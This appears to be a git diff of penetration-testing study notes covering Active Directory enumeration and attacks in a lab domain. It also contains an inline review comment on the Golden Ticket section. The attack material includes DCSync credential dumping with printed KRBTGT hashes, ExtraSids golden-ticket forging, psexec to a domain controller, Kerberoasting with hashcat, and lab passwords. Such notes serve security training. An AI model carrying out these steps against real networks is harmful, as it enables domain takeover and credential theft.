-wmic sysaccount list /format:list -``` - - -[See the net.exe commands in powershell](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about domain groups -net group /domain - -# List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - -# Check current shares -net share - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -# Mount the share locally -net use x: \computer\share - -# Get a list of computers -net view - -# Shares on the domains -net view /all /domain[:domainname] - -# List shares of a computer -net view \computer /ALL - -# List of PCs of the domain -net view /domain -``` - -#### Dsquery - -[Dsquery](dsquery.md) is a helpful command-line tool that can be utilized to find Active Directory objects. - -`dsquery` will exist on any host with the `Active Directory Domain Services Role` installed, and the `dsquery` DLL exists on all modern Windows systems by default now and can be found at `C:\Windows\System32\dsquery.dll`. - -All we need is elevated privileges on a host or the ability to run an instance of Command Prompt or PowerShell from a `SYSTEM` context. 
- -```powershell -# User Search -dsquery user - -# Computer Search -dsquery computer - -# List objects in an OU -dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" - -# List Users With Specific Attributes Set (PASSWD_NOTREQD) by Combining dsquery with LDAP search filters of our choosing. The below looks for users with the PASSWD_NOTREQD flag set in the userAccountControl attribute. -dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl - -# Searching for Domain Controllers - dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName -# userAccountControl:1.2.840.113556.1.4.803: Specifies that we are looking at the User Account Control (UAC) attributes for an object. This portion can change to include three different values we will explain below when searching for information in AD (also known as Object Identifiers (OIDs). -# =8192 represents the decimal bitmask we want to match in this search. This decimal number corresponds to a corresponding UAC Attribute flag that determines if an attribute like password is not required or account is locked is set. - -# Search users with UAC set to `Password Can't Change`: -dsquery * -filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=64))" - -``` - - -## 6. Shares - -### From Windows - -#### Snaffler - -[See snaffler](snaffler.md). - -Snaffler](https://github.com/SnaffCon/Snaffler) is a tool for **pentesters** and **red teamers** to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment). _Broadly speaking_ - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them. 
- - - -```bash -Snaffler.exe -s -d $domain -o snaffler.log -v data -# -s: prints results to the console -# -d: specifies the domain to search within -# -o: writes results to a logfile -# -v: verbosity level. "data" is best as it only displays results to the screen -``` - -### From Linux - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# Enumerate shares -crackmapexec smb $ip -u -p --shares - -# The module spider_plus will dig through each readable share on the host and list all readable files. -sudo crackmapexec smb $ip --local-auth -u -p -d -M spider_plus --share 'NameOfShare' -# CME writes the results to a JSON file located at /tmp/cme_spider_plus/ - -``` - - -#### SMBMap - -[smbmap](smbmap.md) - -```bash -# Enumerate network shares and access associated permissions. -smbmap -H $ip - -# # Enumerate network shares and access associated permissions with recursivity -smbmap -H $ip -r -# --dir-only: provides only the output of all directories and did not list all files. - -# Check access and permissions level for a folder with recursion -smbmap -u $username -p $password -d $domain -H $ip -R $nameofFolder --dir-only - - -``` - -#### rpcclient - -[rpcclient](rpcclient.md) - -```bash -# SMB NULL Session with rpcclient -rpcclient -U "" -N $ip -``` - - - -```shell-session -# SMB NULL Session with rpcclient -rpcclient -U "" -N $ip - -# Connect to a remote shared folder (same as smbclient in this regard) -rpcclient -U "" 10.129.14.128 -rpcclient -U'%' 10.10.110.17 - -# Server information -srvinfo - -# Enumerate all domains that are deployed in the network -enumdomains - -# Provides domain, server, and user information of deployed domains. -querydominfo - -# Enumerates all available shares. -netshareenumall - -# Provides information about a specific share. -netsharegetinfo - -# Get Domain Password Information -getdompwinfo - -# Enumerates all domain users. -enumdomusers - -# Provides information about a specific user. 
-queryuser - # An example: - # rpcclient $> queryuser 0x3e8 - -# Provides information about a specific group. -querygroup - -# Enumerating Privileges -enumprivs - -# Enumerating SID from LSA -lsaenumsid -``` diff --git a/docs/389-636-ldap.md b/docs/389-636-ldap.md index fa71603b8..8e92f7e6b 100644 --- a/docs/389-636-ldap.md +++ b/docs/389-636-ldap.md @@ -26,7 +26,7 @@ The relationship between AD and LDAP can be compared to Apache and HTTP. The sam - It's a binary protocol and by default not encrypted. - Has been updated to include encryptions addons, as Transport Layer Security (TLS)/SSL and can be tunnelled through SSH -The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema. +The hierarchy (tree) of information stored via LDAP is known as the **Directory Information Tree (DIT).** That structure is defined in a schema. A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users. diff --git a/docs/active-directory-from-linux-enumeration.md b/docs/active-directory-from-linux-enumeration.md index 4764cc149..63c7dfbf1 100644 --- a/docs/active-directory-from-linux-enumeration.md +++ b/docs/active-directory-from-linux-enumeration.md 
@@ -381,30 +381,6 @@ It's possible to obtain the Ticket Granting Ticket (TGT) for any account that ha ASREPRoasting is similar to Kerberoasting, but it involves attacking the AS-REP instead of the TGS-REP. An SPN is not required. This setting can be enumerated with PowerView or built-in tools such as the PowerShell AD module. -#### DONT_REQ_PREAUTH Value using Get-DomainUser - -Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser - -```powershell -Import-Module .\PowerView.ps1 -Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl -``` - -With this information in hand, the Rubeus tool can be leveraged to retrieve the AS-REP in the proper format for offline hash cracking. This attack does not require any domain user context and can be done by just knowing the SAM name for the user without Kerberos pre-auth. - -```powershell -# Retrieving AS-REP in Proper Format using Rubeus -.\Rubeus.exe asreproast /user:$user /nowrap /format:hashcat -# Example: -# .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat -``` - -Cracking the Hash Offline with Hashcat: - -```bash -hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt -``` - #### DONT_REQ_PREAUTH Value using kerbrute ```shell-session diff --git a/docs/active-directory-from-linux-privilege-escalation.md b/docs/active-directory-from-linux-privilege-escalation.md index 80e0feefe..195e97597 100644 --- a/docs/active-directory-from-linux-privilege-escalation.md +++ b/docs/active-directory-from-linux-privilege-escalation.md @@ -87,7 +87,7 @@ domain\user22 ``` -## Kerberoasting +## 🔐 Kerberoasting [See about Kerberos authentication](kerberos-authentication.md). 
@@ -165,3 +165,314 @@ hashcat -m 13100 file_tgs /usr/share/wordlists/rockyou.txt #### targetedKerberoast [targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, or supplied in a list, or one user supplied in the CLI. + + +## 👀 Attacking Domain Trusts # 1: Child -> Parent Trusts + +### 🏰 ExtraSids Attack + +Requirements for performing the attack: + +- The KRBTGT hash for the child domain +- The SID for the child domain +- The name of a target user in the child domain (does not need to exist!) +- The FQDN of the child domain +- The SID of the Enterprise Admins group of the root domain + +We have complete control over the child domain, which would be: LOGISTICS.INLANEFREIGHT.LOCAL. + +#### Step 1: getting the KRBTGT hash for the child domain + +We will perform a DCSync attack with secretsdump.py: + +```shell-session +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +``` + +For this we need: +- The user (`htb-student_adm`) must have the necessary privileges to query the domain controller. We need their creds. +- We require to know $targetedDomain and NetbiosNameofDomain. +- The **Impacket** library must be installed, and the tool should be executed in an environment with Python support. 
+- Network connectivity to the target IP (in this example `172.16.5.240`) is required. + +Results: + +``` +Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation + +Password: +[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) +[*] Using the DRSUAPI method to get NTDS.DIT secrets +krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f::: +[*] Kerberos keys grabbed +krbtgt:aes256-cts-hmac-sha1-96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8 +krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e +krbtgt:des-cbc-md5:fee04c3d026d7538 + +``` + +#### Step 2: getting the SID for the child domain + +Next, we can use [lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) , an Impacket script used for querying a Windows system to obtain information about the SID associated with a given user or group. + +The tool will give us back the SID for the domain and the RIDs for each user and group that could be used to create their SID in the format `DOMAIN_SID-RID`. + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 +# Enter password: HTB_@cademy_stdnt_admin! +``` + +If we just want to get the Domain SID, we can filter it out: + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! +``` + +Results: S-1-5-21-2806153819-209893948-922872689 + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) + +For instance, `hacker`. + +#### Step 4: getting the FQDN of the child domain. 
+ +logistics.inlanefreight.local + + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain + +Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5. We will perform a **SID enumeration** on the target system and filter the results to find information related to the **Enterprise Admins** group in the Active Directory (AD) domain. For filtering we will use the RID of the Enterprise Admins group. [Here](active-directory-security-identifiers.md) is a handy list of well-known SIDs. + +```shell-session +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! + +# Way2: +lookupsid.py LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm@INLANEFREIGHT.LOCAL | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! +``` + +Result: +``` +519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +``` + +As the domain SID was: `S-1-5-21-3842939050-3880317879-2865463114` and the RID is `519`, the SID of "Enterprise Admin" group is `S-1-5-21-3842939050-3880317879-2865463114-519` . + + +#### Step 6: Generate a golden ticket + +Next, we can use [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) from the Impacket toolkit to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by `-domain-sid`) and the parent domain (specified by `-extra-sid`). 
+ +```shell-session +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker +``` + +The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: + +``` +[*] Saving ticket in hacker.ccache +``` + + +Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. + +```shell-session +export KRB5CCNAME=hacker.ccache +``` + + +We can check if we can successfully authenticate to the parent domain's Domain Controller using [Impacket's version of Psexec](impacket-psexec.md). If successful, we will be dropped into a SYSTEM shell on the target Domain Controller. + +```shell-session +psexec.py $targetedDomain/$madeupUser@$hostNameDC.$ParentDomain -k -no-pass -target-ip $DomainControllerIP +# Example: +# psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 +# Enter password: HTB_@cademy_stdnt_admin! +``` + + +#### Step 7: Privilege escalation + +Impacket also has the tool [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py), which will automate escalating from child to parent domain. + +We need to specify the target domain controller and credentials for an administrative user in the child domain. + +```shell-session +raiseChild.py -target-exec $DomainControllerIP $TargetedDomain/$UserWithAdminPriv +# Example: +# raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm +# Enter password: HTB_@cademy_stdnt_admin! +# target-exec: If specified, then it will authenticate to the parent domain's Domain Controller via Psexec. 
+ +``` + + +#### Step 8: Accessing another user on domain + +The following will reproduce the entire attack: + + +``` +#### Step 1: getting the KRBTGT hash for the child domain +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 9d765b482771505cbe97411065964d5f +#### + +#### Step 2: getting the SID for the child domain. Obtain the SID for the domain and the RIDs for each user and group and filter out by Domain SID +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" + +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: S-1-5-21-2806153819-209893948-922872689 +#### + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) +hacker +#### + +#### Step 4: getting the FQDN of the child domain. +logistics.inlanefreight.local +#### + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! 
+# Results: 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +#### + +#### Step 6: Generate a golden ticket +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker + +# The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: +[*] Saving ticket in hacker.ccache + +# Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. +export KRB5CCNAME=hacker.ccache +#### + +#### Step 7: Accessing another user on domain +# With one user, we will request the NTLM hash for another user +secretsdump.py $ControlledUsername@$hostnameController.$Parentdomain -k -no-pass -just-dc-ntlm -just-dc-user $targetUsername +# Example: +# secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross + +``` + +### 🌳 Cross-Forest Kerberoasting + + Sometimes you cannot escalate privileges in your current domain, but instead can obtain a Kerberos ticket and crack a hash for an administrative user in another domain that has Domain/Enterprise Admin privileges in both domains. +  +To do this, we need credentials for a user that can authenticate into the other domain and specify the `-target-domain` flag in our command. +  +```shell-session +GetUserSPNs.py -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + + +Rerunning the command with the `-request` flag added gives us the TGS ticket. 
+ +```shell-session +GetUserSPNs.py -request -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + +Now, with those TGS we could try to crack them offline + +```bash +hashcat -m 13100 tickettocrack /usr/share/wordlists/rockyou.txt +``` + + +### 🐇 Hunting Foreign Group Membership with Bloodhound-python + +we may, from time to time, see users or admins from one domain as members of a group in another domain.  Since only `Domain Local Groups` allow users from outside their forest, it is not uncommon to see a highly privileged user from Domain A as a member of the built-in administrators group in domain B when dealing with a bidirectional forest trust relationship. + + If we are testing from a Linux host, we can gather this information by using the [Python implementation of BloodHound](https://github.com/fox-it/BloodHound.py). + +**Collecting information from INLANEFREIGHT.LOCAL** + +```shell-session +sudo nano /etc/resolv.conf +``` + +Modify the file so it will have the following entries: + +``` +#nameserver 1.1.1.1 +#nameserver 8.8.8.8 +domain INLANEFREIGHT.LOCAL +nameserver 172.16.5.5 +``` + +Running bloodhound-python Against INLANEFREIGHT.LOCAL: + +```bash +bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2 +``` + +We can compress the resultant zip files to upload one single zip file directly into the BloodHound GUI. 
+ +```shell-session +zip -r ilfreight_bh.zip *.json +``` + + +**Collecting information from INLANEFREIGHT.LOCAL** + +```shell-session +sudo nano /etc/resolv.conf +``` + +Modify the file so it will have the following entries: + +```shell-session +#nameserver 1.1.1.1 +#nameserver 8.8.8.8 +domain FREIGHTLOGISTICS.LOCAL +nameserver 172.16.5.238 +``` + +Running bloodhound-python Against FREIGHTLOGISTICS.LOCAL + +```shell-session +bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u forend@inlanefreight.local -p Klmcargo2 +``` + +We can compress the resultant zip files to upload one single zip file directly into the BloodHound GUI. + +```shell-session +zip -r FREIGHTLOGISTICS.zip *.json +``` + +Transfer the files to your attacker machine, open [Bloodhound](bloodhound.md) in your attacker machine, upload the zip. Now we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL. Here, we will see the built-in Administrator account for the INLANEFREIGHT.LOCAL domain is a member of the built-in Administrators group in the FREIGHTLOGISTICS.LOCAL domain as we saw previously. + +![](img/blood03.png) + diff --git a/docs/active-directory-from-windows-attacks.md b/docs/active-directory-from-windows-attacks.md index 5c017b36d..4de822423 100644 --- a/docs/active-directory-from-windows-attacks.md +++ b/docs/active-directory-from-windows-attacks.md @@ -198,7 +198,7 @@ GET NTLMV2USERNAMES [See https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/.](https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/) -## ⛓️DCShadow +## ⛓️ DCShadow [See https://blog.netwrix.com/2022/09/28/dcshadow_attack/](https://blog.netwrix.com/2022/09/28/dcshadow_attack/) diff --git a/docs/active-directory-from-windows-enumeration.md b/docs/active-directory-from-windows-enumeration.md index 9be56d77d..8dd651e3a 100644 
--- a/docs/active-directory-from-windows-enumeration.md +++ b/docs/active-directory-from-windows-enumeration.md @@ -26,7 +26,6 @@ tags: - **Tool for enumeration**: - [Enumeration with LDAP queries](389-636-ldap.md) 
@@ -1111,3 +1110,116 @@ Get-GPO -Guid $GUID [See how to take this attack further](active-directory-from-windows-attacks.md#group-policy-object-abuse). +## 9. Trust Relationships + +### Introduction to Domain Trust Overview + +A trust creates a link between the authentication systems of two domains and may allow either one-way or two-way (bidirectional) communication. + +Types of trusts: + +- `Parent-child`: Two or more domains within the same forest. The child domain has a two-way transitive trust with the parent domain, meaning that users in the child domain `corp.inlanefreight.local` could authenticate into the parent domain `inlanefreight.local`, and vice-versa. +- `Cross-link`: A trust between child domains to speed up authentication. +- `External`: A non-transitive trust between two separate domains in separate forests which are not already joined by a forest trust. This type of trust utilizes [SID filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) or filters out authentication requests (by SID) not from the trusted domain. +- `Tree-root`: A two-way transitive trust between a forest root domain and a new tree root domain. They are created by design when you set up a new tree root domain within a forest. +- `Forest`: A transitive trust between two forest root domains. +- [ESAE](https://docs.microsoft.com/en-us/security/compass/esae-retirement): A bastion forest used to manage Active Directory. + + +Trusts can be transitive or non-transitive: + +- A `transitive` trust means that trust is extended to objects that the child domain trusts: + - Shared, 1 to many. + - The trust is shared with anyone in the forest. + - Forest, tree-root, parent-child, and cross-link trusts are transitive. +- In a non-transitive trust, the child domain itself is the only one trusted: + - Direct trust. + - Not extended to the next level child domains. + - Typical for external or custom trust setup. 
+ + +Trusts can be set up in two directions: one-way or two-way (bidirectional): + +- - `One-way trust`: Users in a `trusted` domain can access resources in a trusting domain, not vice-versa. +- `Bidirectional trust`: Users from both trusting domains can access resources in the other domain. + +### Windows binary: nltest + +Similar, but very simplified information could be gleaned from a native Windows binary: + +```powershell +nltest /domain_trusts +``` + + +### Powershell + +Powershell way of checking trust relationships: + +```powershell +([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() +``` + +### Active Directory module: Get-ADTrust + +[See complete Active directory powershell module](activedirectory-powershell-module.md). + +```powershell +Import-Module activedirectory +Get-ADTrust -Filter * +``` + +Pay attention to properties such as Direction, ForestTransitive and some others. + +From here we could enumerate users in the child domain: + +```powershell +Get-DomainUser -Domain $domain | select SamAccountName +# Example: +# Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName +``` + + +### PowerView.ps1 module: Get-DomainTrust + +PowerView can be used to perform a domain trust mapping and provide information such as the type of trust (parent/child, external, forest) and the direction of the trust (one-way or bidirectional). + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainTrust +``` + +Also we could do some mapping: + +```powershell +Get-DomainTrustMapping +``` + +### netdom + +The `netdom query` sub-command of the `netdom` command-line tool in Windows can retrieve information about the domain, including a list of workstations, servers, and domain trusts. 
+ +```cmd-session +# List trusts: +netdom query /domain:$domain trust +# Example: +# netdom query /domain:inlanefreight.local trust + +# Enumerate Domain Controllers with accounts in the domain +netdom query /domain:$domain dc +# Example: +# netdom query /domain:inlanefreight.local dc + +# query workstations and servers +netdom query /domain:$domain workstation +# Example: +# netdom query /domain:inlanefreight.local workstation +``` + + +### Visualizing Trust Relationships in BloodHound + +[See more about bloodhound](bloodhound.md). + +![](img/blood02.png) + diff --git a/docs/active-directory-from-windows-privilege-escalation.md b/docs/active-directory-from-windows-privilege-escalation.md index 6c91efae8..544424550 100644 --- a/docs/active-directory-from-windows-privilege-escalation.md +++ b/docs/active-directory-from-windows-privilege-escalation.md 
@@ -255,6 +255,11 @@ The vulnerability allowed a forged PAC to be accepted by the KDC as legitimate. ### ❗ Kerberos Resource-Based Constrained Delegation (RBCD) [PENDING] +### The Golden Ticket attack + +**The attack in a nugshell:** First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments.  The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account. + + ### Kerberos "Double Hop" Problem **Kerberos "Double Hop" Problem**: The "Double Hop" problem often occurs when using WinRM/Powershell or Evil-WinRM, since the default authentication mechanism only provides a ticket to access a specific resource (winrm). When we use Kerberos to establish a remote session, we are not using a password for authentication, and the user's ticket-granting service (TGS) ticket is sent to the remote service, but the TGT ticket is not sent. Therefore, when we try to authenticate over a second resource, the machine can not pull any hash from memory or generate any TGS to authenticate us. 
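Review bot: in the new "The Golden Ticket attack" section the closing sentence "The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account" understates the remediation: the KRBTGT password has to be reset twice, with replication allowed to complete in between, because the KDC keeps accepting tickets encrypted under the previous KRBTGT key until the second reset pushes it out of the password history. Also "nugshell" should read "nutshell", and the paragraph repeats the opening sentence of "Step 1: getting the KRBTGT hash from the child domain" added further down in this patch without giving any commands of its own; a link to that step (lsadump::dcsync for the hash, kerberos::golden for the ticket) would avoid maintaining the same text in two places.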
@@ -1039,6 +1044,300 @@ This repository provides a few techniques and scripts regarding the impact of Mi If we can compromise an Exchange server, this will often lead to Domain Admin privileges. +## 👀 Attacking Domain Trusts # 1: Child -> Parent Trusts + +### ExtraSids Attack - Mimikatz + +The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. + +The attack explained in a nugshell: + +- Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. +- When logging in with this account, all of the SIDs associated with the account are added to the user's token. +- If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001/) or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence. + +#### Introduction to SID History and SID Filtering +[SID Filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) prevents such abuse by verifying and blocking unauthorized or suspicious SIDs during authentication across a trust. + +>**SID History** exists specifically to allow migrated users to access resources in the original domain. Enabling SID Filtering disrupts this functionality by ignoring SID history during authentication across trust boundaries. This trade-off arises because: +> +>1. **Functionality Comes with Risk:** + Allowing SID history in a trust scenario opens the door for **privilege escalation attacks** through SID injection. + > +>2. 
**SID History is Not Always Needed:** + > +> - In many migration scenarios, users may no longer need access to the original domain once migration is complete. In such cases, the risks of allowing SID history outweigh the benefits. +> - SID Filtering is particularly useful in inter-forest or external trust scenarios where one environment does not fully trust the security practices of the other. +> +>3. **Balancing Security and Usability:** +> Organizations must evaluate their specific requirements. If SID history functionality is crucial, **SID Filtering can be disabled selectively** for specific trusts while mitigating risks through other means (e.g., enhanced monitoring or strict trust policies). + + +> **Why SID Filtering is Still Useful** +> +>While SID Filtering blocks the main functionality of SID history, its purpose is not to disable SID history entirely but to **control where and when SID history can be used**: +> +>- **Within the Same Forest:** +> SID Filtering is typically not applied to intra-forest authentication because all domains in a forest share the same schema and security boundary. SID History works seamlessly here. + > Example: Users migrating between domains in the same forest (`DomainA.local` to `DomainB.local`) can use SID history without interference. + > +>- **Between Different Forests:** + Trusts between forests (or external domains) are high-risk. SID Filtering ensures that only valid SIDs from the trusted forest or domain are honored, blocking any unauthorized or injected SIDs. + +#### The attack + +To perform this attack after compromising a child domain, we need the following: + +- The KRBTGT hash for the child domain +- The SID for the child domain +- The name of a target user in the child domain (does not need to exist!) +- The FQDN of the child domain. +- The SID of the Enterprise Admins group of the root domain. +- With this data collected, the attack can be performed with Mimikatz. 
+ +##### Step 1: getting the KRBTGT hash from the child domain +First, we need to obtain the NT hash for the [KRBTGT](https://adsecurity.org/?p=483) account, which is a service account for the Key Distribution Center (KDC) in Active Directory. + +Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account. + +```cmd-session +# Go to mimikatz.exe file in the explorer and execute as admin + +lsadump::dcsync /user:$domain\$user +# Example: +# .\mimikatz.exe +# lsadump::dcsync /user:LOGISTICS\krbtgt +``` + +Results: + +``` +[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain +[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server +[DC] 'LOGISTICS\krbtgt' will be the user account +[rpc] Service : ldap +[rpc] AuthnSvc : GSS_NEGOTIATE (9) + +Object RDN : krbtgt + +** SAM ACCOUNT ** + +SAM Username : krbtgt +Account Type : 30000000 ( USER_OBJECT ) +User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) +Account expiration : +Password last change : 11/1/2021 10:21:33 AM +Object Security ID : S-1-5-21-2806153819-209893948-922872689-502 +Object Relative ID : 502 + +Credentials: + Hash NTLM: 9d765b482771505cbe97411065964d5f + ntlm- 0: 9d765b482771505cbe97411065964d5f + lm - 0: 69df324191d4a80f0ed100c10f20561e + +Supplemental Credentials: + +SNIP + +``` + +KRBTGT hash : `9d765b482771505cbe97411065964d5f`. + +##### Step 2: getting the SID for the child domain + +```powershell +Import-Module .\PowerView.ps1 +Get-DomainSID +``` + +However it was also visible in the Mimikatz output above. + +##### Step 3: getting the name of a target user in the child domain (does not need to exist!) + +For instance, `hacker`. + +##### Step 4: getting the FQDN of the child domain. + +It was also visible in the Mimikatz output above: `LOGISTICS.INLANEFREIGHT.LOCAL`. 
